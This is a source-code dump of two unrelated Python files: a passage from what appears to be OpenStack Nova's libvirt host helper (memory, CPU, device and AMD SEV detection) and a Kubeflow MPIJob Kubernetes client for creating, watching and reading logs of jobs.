with excutils.save_and_reraise_exception():
LOG.error('Error defining a secret with XML: %s', xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
if CONF.libvirt.file_backed_memory > 0:
return CONF.libvirt.file_backed_memory
else:
return self._get_hardware_info()[1]
def _sum_domain_memory_mb(self, include_host=True):
"""Get the total memory consumed by guest domains
If include_host is True, subtract available host memory from guest 0
to get real used memory within dom0 within xen
"""
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info()[2])
except libvirt.libvirtError as e:
LOG.warning("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s",
{"uuid": guest.uuid, "ex": e})
continue
if include_host and guest.id == 0:
# Memory usage for the host domain (dom0 in xen) is the
# reported memory minus available memory
used += (dom_mem - self._get_avail_memory_kb())
else:
used += dom_mem
# Convert it to MB
return used // units.Ki
@staticmethod
def _get_avail_memory_kb():
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
avail = int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1])
return avail
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if CONF.libvirt.virt_type == 'xen':
# For xen, report the sum of all domains, with
return self._sum_domain_memory_mb(include_host=True)
elif CONF.libvirt.file_backed_memory > 0:
# For file_backed_memory, report the total usage of guests,
# ignoring host memory
return self._sum_domain_memory_mb(include_host=False)
else:
return (self.get_memory_mb_total() -
(self._get_avail_memory_kb() // units.Ki))
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: an instance of Guest
"""
if six.PY2:
xml = encodeutils.safe_encode(xml)
domain = self.get_connection().defineXML(xml)
return libvirt_guest.Guest(domain)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("pci", flags=flags)
def list_mdev_capable_devices(self, flags=0):
"""Lookup devices supporting mdev capabilities.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev_types", flags=flags)
def list_mediated_devices(self, flags=0):
"""Lookup mediated devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev", flags=flags)
def _list_devices(self, cap, flags=0):
"""Lookup devices.
:returns: a list of virNodeDevice instance
"""
try:
return self.get_connection().listDevices(cap, flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support "
"listDevices: %(error)s",
{'uri': self._uri, 'error': ex})
return []
else:
raise
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
# mount options and split options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
@property
def has_hyperthreading(self):
"""Determine if host CPU has SMT, a.k.a. HyperThreading.
:return: True if the host has SMT enabled, else False.
"""
if self._has_hyperthreading is not None:
return self._has_hyperthreading
self._has_hyperthreading = False
# we don't use '/capabilities/host/cpu/topology' since libvirt doesn't
# guarantee the accuracy of this information
for cell in self.get_capabilities().host.topology.cells:
if any(len(cpu.siblings) > 1 for cpu in cell.cpus if cpu.siblings):
self._has_hyperthreading = True
break
return self._has_hyperthreading
def _kernel_supports_amd_sev(self):
if not os.path.exists(SEV_KERNEL_PARAM_FILE):
LOG.debug("%s does not exist", SEV_KERNEL_PARAM_FILE)
return False
with open(SEV_KERNEL_PARAM_FILE) as f:
contents = f.read()
LOG.debug("%s contains [%s]", SEV_KERNEL_PARAM_FILE, contents)
return contents == "1\n"
@property
def supports_amd_sev(self):
"""Returns a boolean indicating whether AMD SEV (Secure Encrypted
Virtualization) is supported. This is conditional on support
in the hardware, kernel, qemu, and libvirt.
The result is memoized, since it is not expected to change
during the lifetime of a running nova-compute service; if the
hypervisor stack is changed or reconfigured in a way which
would affect the support, nova-compute should be restarted
anyway.
"""
if self._supports_amd_sev is None:
self._set_amd_sev_support()
return self._supports_amd_sev
def _set_amd_sev_support(self):
self._supports_amd_sev = False
if not self._kernel_supports_amd_sev():
LOG.info("kernel doesn't support AMD SEV")
self._supports_amd_sev = False
return
domain_caps = self.get_domain_capabilities()
for arch in domain_caps:
for machine_type in domain_caps[arch]:
LOG.debug("Checking SEV support for arch %s "
"and machine type %s", arch, machine_type)
for feature in domain_caps[arch][machine_type].features:
feature_is_sev = isinstance(
feature, vconfig.LibvirtConfigDomainCapsFeatureSev)
if (feature_is_sev and feature.supported):
LOG.info("AMD SEV support detected")
self._supports_amd_sev = True
return
LOG.debug("No AMD SEV support detected for any (arch, machine_type)")
|
mpi_job_client.py
|
# Copyright 2021 The Kubeflow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import time
import logging
import threading
import queue
from kubernetes import client, config
from kubernetes import watch as k8s_watch
from kubeflow.training.constants import constants
from kubeflow.training.utils import utils
from .mpi_job_watch import watch as mpijob_watch
logging.basicConfig(format='%(message)s')
logging.getLogger().setLevel(logging.INFO)
def wrap_log_stream(q, stream):
while True:
try:
logline = next(stream)
q.put(logline)
except StopIteration:
q.put(None)
return
except Exception as e:
raise RuntimeError(
"Exception when calling CoreV1Api->read_namespaced_pod_log: %s\n" % e)
def get_log_queue_pool(streams):
pool = []
for stream in streams:
q = queue.Queue(maxsize=100)
pool.append(q)
threading.Thread(target=wrap_log_stream, args=(q, stream)).start()
return pool
class MPIJobClient(object):
def __init__(self, config_file=None, context=None, # pylint: disable=too-many-arguments
client_configuration=None, persist_config=True):
"""
MPIJob client constructor
:param config_file: kubeconfig file, defaults to ~/.kube/config
:param context: kubernetes context
:param client_configuration: kubernetes configuration object
:param persist_config:
"""
if config_file or not utils.is_running_in_k8s():
config.load_kube_config(
config_file=config_file,
context=context,
client_configuration=client_configuration,
persist_config=persist_config)
else:
config.load_incluster_config()
self.custom_api = client.CustomObjectsApi()
self.core_api = client.CoreV1Api()
def create(self, mpijob, namespace=None):
"""
Create the MPIJob
:param mpijob: mpijob object
:param namespace: defaults to current or default namespace
:return: created mpijob
"""
if namespace is None:
namespace = utils.set_mpijob_namespace(mpijob)
try:
outputs = self.custom_api.create_namespaced_custom_object(
constants.MPIJOB_GROUP,
constants.MPIJOB_VERSION,
namespace,
constants.MPIJOB_PLURAL,
mpijob)
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CustomObjectsApi->create_namespaced_custom_object:\
%s\n" % e)
return outputs
def get(self, name=None, namespace=None, watch=False,
timeout_seconds=600): # pylint: disable=inconsistent-return-statements
"""
Get the mpijob
:param name: existing mpijob name, if not defined, the get all mpijobs in the namespace.
:param namespace: defaults to current or default namespace
:param watch: Watch the MPIJob if `True`.
:param timeout_seconds: How long to watch the job..
:return: mpijob
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
if name:
if watch:
mpijob_watch(
name=name,
namespace=namespace,
timeout_seconds=timeout_seconds)
else:
thread = self.custom_api.get_namespaced_custom_object(
constants.MPIJOB_GROUP,
constants.MPIJOB_VERSION,
namespace,
constants.MPIJOB_PLURAL,
name,
async_req=True)
mpijob = None
try:
mpijob = thread.get(constants.APISERVER_TIMEOUT)
except multiprocessing.TimeoutError:
raise RuntimeError("Timeout trying to get MPIJob.")
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CustomObjectsApi->get_namespaced_custom_object:\
%s\n" % e)
except Exception as e:
raise RuntimeError(
"There was a problem to get MPIJob {0} in namespace {1}. Exception: \
{2} ".format(name, namespace, e))
return mpijob
else:
if watch:
mpijob_watch(
namespace=namespace,
timeout_seconds=timeout_seconds)
else:
thread = self.custom_api.list_namespaced_custom_object(
constants.MPIJOB_GROUP,
constants.MPIJOB_VERSION,
namespace,
constants.MPIJOB_PLURAL,
async_req=True)
mpijobs = None
try:
mpijobs = thread.get(constants.APISERVER_TIMEOUT)
except multiprocessing.TimeoutError:
raise RuntimeError("Timeout trying to get MPIJob.")
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CustomObjectsApi->list_namespaced_custom_object:\
%s\n" % e)
except Exception as e:
raise RuntimeError(
"There was a problem to list MPIJobs in namespace {0}. \
Exception: {1} ".format(namespace, e))
return mpijobs
def patch(self, name, mpijob, namespace=None):
"""
Patch existing mpijob
:param name: existing mpijob name
:param mpijob: patched mpijob
:param namespace: defaults to current or default namespace
:return: patched mpijob
"""
if namespace is None:
namespace = utils.set_mpijob_namespace(mpijob)
try:
outputs = self.custom_api.patch_namespaced_custom_object(
constants.MPIJOB_GROUP,
constants.MPIJOB_VERSION,
namespace,
constants.MPIJOB_PLURAL,
name,
mpijob)
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CustomObjectsApi->patch_namespaced_custom_object:\
%s\n" % e)
return outputs
def delete(self, name, namespace=None):
"""
Delete the mpijob
:param name: mpijob name
:param namespace: defaults to current or default namespace
:return:
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
try:
return self.custom_api.delete_namespaced_custom_object(
group=constants.MPIJOB_GROUP,
version=constants.MPIJOB_VERSION,
namespace=namespace,
plural=constants.MPIJOB_PLURAL,
name=name,
body=client.V1DeleteOptions())
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CustomObjectsApi->delete_namespaced_custom_object:\
%s\n" % e)
def wait_for_job(self, name, # pylint: disable=inconsistent-return-statements
namespace=None,
timeout_seconds=600,
polling_interval=30,
watch=False,
status_callback=None):
"""Wait for the specified job to finish.
:param name: Name of the TfJob.
:param namespace: defaults to current or default namespace.
:param timeout_seconds: How long to wait for the job.
:param polling_interval: How often to poll for the status of the job.
:param watch: Watch the MPIJob if `True`.
:param status_callback: (Optional): Callable. If supplied this callable is
invoked after we poll the job. Callable takes a single argument which
is the job.
:return:
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
if watch:
mpijob_watch(
name=name,
namespace=namespace,
timeout_seconds=timeout_seconds)
else:
return self.wait_for_condition(
name,
["Succeeded", "Failed"],
namespace=namespace,
timeout_seconds=timeout_seconds,
polling_interval=polling_interval,
status_callback=status_callback)
def wait_for_condition(self, name,
expected_condition,
namespace=None,
timeout_seconds=600,
polling_interval=30,
status_callback=None):
"""Waits until any of the specified conditions occur.
:param name: Name of the job.
:param expected_condition: A list of conditions. Function waits until any of the
supplied conditions is reached.
:param namespace: defaults to current or default namespace.
:param timeout_seconds: How long to wait for the job.
:param polling_interval: How often to poll for the status of the job.
:param status_callback: (Optional): Callable. If supplied this callable is
invoked after we poll the job. Callable takes a single argument which
is the job.
:return: Object MPIJob status
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
for _ in range(round(timeout_seconds / polling_interval)):
mpijob = None
mpijob = self.get(name, namespace=namespace)
if mpijob:
if status_callback:
status_callback(mpijob)
# If we poll the CRD quick enough status won't have been set yet.
conditions = mpijob.get("status", {}).get("conditions", [])
# Conditions might have a value of None in status.
conditions = conditions or []
for c in conditions:
if c.get("type", "") in expected_condition:
return mpijob
time.sleep(polling_interval)
raise RuntimeError(
"Timeout waiting for MPIJob {0} in namespace {1} to enter one of the "
"conditions {2}.".format(name, namespace, expected_condition), mpijob)
def get_job_status(self, name, namespace=None):
"""Returns MPIJob status, such as Running, Failed or Succeeded.
:param name: The MPIJob name.
:param namespace: defaults to current or default namespace.
:return: Object MPIJob status
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
mpijob = self.get(name, namespace=namespace)
last_condition = mpijob.get("status", {}).get("conditions", [{}])[-1]
return last_condition.get("type", "")
def is_job_running(self, name, namespace=None):
"""Returns true if the MPIJob running; false otherwise.
:param name: The MPIJob name.
:param namespace: defaults to current or default namespace.
:return: True or False
"""
mpijob_status = self.get_job_status(name, namespace=namespace)
return mpijob_status.lower() == "running"
def is_job_succeeded(self, name, namespace=None):
"""Returns true if the MPIJob succeeded; false otherwise.
:param name: The MPIJob name.
:param namespace: defaults to current or default namespace.
:return: True or False
"""
mpijob_status = self.get_job_status(name, namespace=namespace)
return mpijob_status.lower() == "succeeded"
def get_pod_names(self, name, namespace=None, master=False, # pylint: disable=inconsistent-return-statements
replica_type=None, replica_index=None):
"""
Get pod names of MPIJob.
:param name: mpijob name
:param namespace: defaults to current or default namespace.
:param master: Only get pod with label 'job-role: master' pod if True.
:param replica_type: User can specify one of 'worker, ps, chief' to only get one type pods.
By default get all type pods.
:param replica_index: User can specfy replica index to get one pod of MPIJob.
:return: set: pods name
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
labels = utils.get_job_labels(name, master=master,
replica_type=replica_type,
replica_index=replica_index)
try:
resp = self.core_api.list_namespaced_pod(
namespace, label_selector=utils.to_selector(labels))
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CoreV1Api->read_namespaced_pod_log: %s\n" % e)
pod_names = []
for pod in resp.items:
if pod.metadata and pod.metadata.name:
pod_names.append(pod.metadata.name)
if not pod_names:
logging.warning("Not found Pods of the MPIJob %s with the labels %s.", name, labels)
else:
return set(pod_names)
def get_logs(self, name, namespace=None, master=True,
replica_type=None, replica_index=None,
follow=False, container="mpi"):
"""
Get training logs of the MPIJob.
By default only get the logs of Pod that has labels 'job-role: master'.
:param container: container name
:param name: mpijob name
:param namespace: defaults to current or default namespace.
:param master: By default get pod with label 'job-role: master' pod if True.
If need to get more Pod Logs, set False.
:param replica_type: User can specify one of 'worker, ps, chief' to only get one type pods.
By default get all type pods.
:param replica_index: User can specfy replica index to get one pod of MPIJob.
:param follow: Follow the log stream of the pod. Defaults to false.
:return: str: pods logs
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
pod_names = list(self.get_pod_names(name, namespace=namespace,
master=master,
replica_type=replica_type,
replica_index=replica_index))
if pod_names:
if follow:
log_streams = []
for pod in pod_names:
log_streams.append(k8s_watch.Watch().stream(self.core_api.read_namespaced_pod_log,
name=pod, namespace=namespace, container=container))
finished = [False for _ in log_streams]
# create thread and queue per stream, for non-blocking iteration
log_queue_pool = get_log_queue_pool(log_streams)
# iterate over every watching pods' log queue
while True:
for index, log_queue in enumerate(log_queue_pool):
if all(finished):
return
if finished[index]:
continue
# grouping the every 50 log lines of the same pod
for _ in range(50):
try:
logline = log_queue.get(timeout=1)
if logline is None:
finished[index] = True
break
logging.info("[Pod %s]: %s", pod_names[index], logline)
except queue.Empty:
break
else:
for pod in pod_names:
try:
pod_logs = self.core_api.read_namespaced_pod_log(pod, namespace, container=container)
logging.info("The logs of Pod %s:\n %s", pod, pod_logs)
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CoreV1Api->read_namespaced_pod_log: %s\n" % e)
else:
raise RuntimeError("Not found Pods of the MPIJob {} "
"in namespace {}".format(name, namespace))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.